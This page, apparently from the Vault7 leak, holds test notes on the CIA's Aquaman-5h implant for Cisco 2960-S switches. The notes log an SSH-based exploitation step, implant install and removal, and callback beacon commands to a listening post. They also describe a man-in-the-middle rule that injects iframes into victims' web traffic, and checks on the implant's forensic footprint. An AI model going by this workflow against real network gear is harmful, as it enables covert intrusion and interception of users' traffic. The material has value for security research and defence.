Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
Aquaman-5h-Without-Snooping Test Notes
Xetron redelivered Aquaman-5h without snooping as an interim solution to EAREnterprise Archive 5244. Plan is to run through Smoke tests from previous Aquaman-5h testing, as well as verify that the bug from EAREnterprise Archive 5244 is not reproducible.
Testing Summary
- 2960S crashes and reloads if show stacks issued during a reinstall of hg (after initial install with leave_behind and uninstall)
- Confirmed snoop not enabled
Progress / Notes
- Run through HG Base Smoke Tests
- Install/Uninstall without leave-behind
- Establish baseline values for clean target device - skipped because we already have that data from previous testing
- IAC attack - successful, received codes were 125, 60, 159 which are in the readme
- Edited target-aliases to use target address 172.31.255.14
- Edited target-aliases to use correct proc_id
- HG upload - hg_start, left 1s delay between packets
- HG uploaded successfully - result good
- Establish CTCounter Terrorism Session with HG according to readme
- Edit Aquaman-5h.txt hostfile - set listening interface of flux node to eth0 and IP to trigger to 192.168.21.10 (Seeds host)
- Ran ./prep-ct.sh
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme
- device uninstall_hg -mp -f - Successful
- Memory back down, no syslog messages, no crash
- Install/Uninstall with leave-behind
- Reloaded switch to start with a clean switch
- SSHIAC attack - successful, received codes were in readme
- HG upload - hg_start_leave_behiind - delay of 1s delay between packets - Successful
- Collected a show tech
- Establish CTCounter Terrorism Session with HG according to readme
- Started CutThroat ./cutthroat ilm_hg.so - listening on 443 and trigger windows
- Trigger implant - beacon call_base_back https 172.20.12.22 443 -ii 192.168.21.10 -im 0050.5688.256d -iv 1 -mi 0011.bb89.21c4
- 0011.bb89.21c4 is MACApple Operating System address of 192.168.21.1
- Successful HG comms
- Uninstall according to readme - successful, no anamolies seen
- Did broad on remote - ok
- hg_start to reinstall
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
Instruction Access Exception (0x0400)!
Not sure if this was related to entering show stacks whlie hg reinstall taking place or if that was a coincidence
- While hg was reinstalling, i typed show stacks on switch - 1s later the switch crashed with the following error:
- Attempt to reproduce the crash
- SSHIAC attack
- Changed interpacket time to 0.1s
- hg_start_leave_behind - successful
- Establish CTCounter Terrorism Session
- Uninstall according to readme - successful, no anamolies seen
- hg_start to reinstall
- No show commands entered - successful reinstall
- Establish CTCounter Terrorism Session
- Uninstall hg - successful
- SSHIAC attack
- hg_start_leave_behind to reintsall
- this time, enter show stacks during install
- no crashes - output of show stacks does show the artifacts, this is a known issue
- Could not establish comms - reloading switch and going to try to repeat again
- Reloaded switch
- SSHIAC attack
- hg_start_leave_behind
- Establish CTCounter Terrorism session
- device hg_uninstall -mp -f
- hg_start_leave_behind - i entered show stacks during install and it crashed again
- Command and Control
- Establish CTCounter Terrorism session and verify versions/capabilities
- Reload switch to start with clean target
- SSHIAC attack
- hg_start
- Established CTCounter Terrorism session
- ilm show - ilm version 3.8.0
- device get_uid - 1ce85d68a280
- beacon show - beacon not enabled for this op
- capability show -v
- baseline version 3.3.0
- lists all modules
- Basic command and control
- module show - modules running
- module stop Trigger - success
- module start Trigger.mod - success
- ilm refresh - success
- module show - success - Trigger module running
- Hit tab key to verify output of available commands
- mitm present, collect present
- dns show, web show, https show - startup delay set to 32850k days - no snoop
- dns get_snooped_host_list_client 0 100 - no snooped hosts even though seeds running
- Boundary Test
- Run through list in HG Base Smoke Test Procedure - all failed gracefully, did not attempt to start snoop
- Establish CTCounter Terrorism session and verify versions/capabilities
- CI Profile
- Collect output for comparison - collected output in new files, will compare to previous test output
- 29.66712 MB more Used memory with HG installed
- Observed same spikes in CPU during SSHIAC attack, HG upload and SSLSecure Socket Layer handshake as observed in previous testing
- No change to file system
- Show tech - observed known show stacks and show controllers artifacts
- Show tech after hg uninstall - output of show tech platform tcam util asic all has a higher number for one value - IPv4 security aces went from 36 to 284 for ASIC 0 and ASIC 1 - need to test this further
- Show tech with hg - no output for remote command all show vtp status, whereas there is output for without hg and after hg uninstall. need to test this further.
- Added to Rancid and ran once with HG, then uninstalled hg, reloaded switch, and ran rancid again to compare
- RANCID rev 1.3 with HG, rev 1.5 without - no differences
- Collect output for comparison - collected output in new files, will compare to previous test output
- SMITE Smoke Test - following documented HG 3.3.0 SMITE Capability Smoke Test Procedure
- Start with a clean, reloaded 2960-S
- SSHIAC attack and HG install
- Established CTCounter Terrorism session
- Completed module control test - stop, start - did not complete module delete and reload test
- Did not test module persistence
- Created SMITE rule
- Iframe is injected into web page, viewed in source URL
- Able to attach in Windex and view secrets.txt
- Deleted mitm rule - iframe no longer injected
- Samsonite Test Case - Uninstall HG and re-attack
- Reloaded 2960-S to start with a clean target device
- Attacked with SSHIAC, installed HG and established comms
- Attempted uninstall hg command device uninstall_hg -mp -f - then typed yes to confirm, result success.
- Checked used memory on the target 2960-S and the memory has gone back to down normal level without HG installed (may be slight difference, need to do the math), no syslog messages, no CPU spike
- Re-attacked using SSHIAC, installed HG, established HG comms - no anomalies
- Uninstalled HG again using device uninstall_hg -mp -f - no anomalies
- No syslogs
- Used memory back to normal
- Samsonite Test Case - Dropped connection during HG install
- Reloaded 2960-S to start with a clean target device
- Attacked with SSHIAC
- Entered hg_start and after just a few chunks were sent, shut int g1/0/11 via console connection on 2960-S to simulate network outage
- ICON-CT reported HG install failed
- No syslog messages from switch
- Used memory still shows higher than it should, but not as high as if HG were installed - 27657488 (b)
- Issued no shut on 2960-S interface g1/0/11 to re-enable the connection
- Entered hg_start on ICON-CT and HG successfully uploaded - used memory after successful install - 30524888 (b)
- Re-test EAREnterprise Archive 5244
- With HG installed, but CTCounter Terrorism session, enter service network restart on Seeds host 10x
- Did not see err-disable condition
- Established CTCounter Terrorism session and enter service network restart on Seeds host 10x
- Did not see err-disable condition
- Samsonite Test Case - Attempt to install HG when HG already installed
- Cannot initiate hg_start again via remote - reports comms failure
- Attempted to re-attack with SSHIAC - seemed to go through normal SSHIAC install process, however at the end of the install, could not establish comms with remote
- Broad didn't work
- hg_start fails
- CT session with HG active throughout
- Samsonite Test Case - Enable MITMMan-In-The-Middle attack rule and execute system administrator commands
- Enabled the SMITE MITMMan-In-The-Middle attack rule in HG
- Performed the following with no anomalies observed
- Cleared log buffer
- Disable/re-enable logging
- Multiple show commands - show vlan, mac-address table, memory, proc cpu, proc cpu hist, log,run
- Write mem
- Add/delete a user
- Add/delete a VLAN
- Verified that SMITE works by web browsing from Victim VMVirtual Machine - collected output from Wireshark running on Victim VMVirtual Machine which shows Iframe
- Samsonite Test Case - Issue Cisco "test crash" command to test crash and generate a crashinfo
- With HG installed, issued test crash and selected reason as software forced crash
- Saved output of crashinfo file
- Saved log messages seen upon reboot of switch in log buffer
- Memory used had returned to normal levels for no HG
- Without HG installed, repeated test crash - need to compare crashinfo
- Reloaded 2960-S to remove HG
- Issued "test crash" command with software forced crash as reason
- Saved output of crashinfo file
- Saved syslog messages seen up reboot of switch in log buffer - log messages are the same as seen on test crash with HG
- With HG installed, issued test crash and selected reason as software forced crash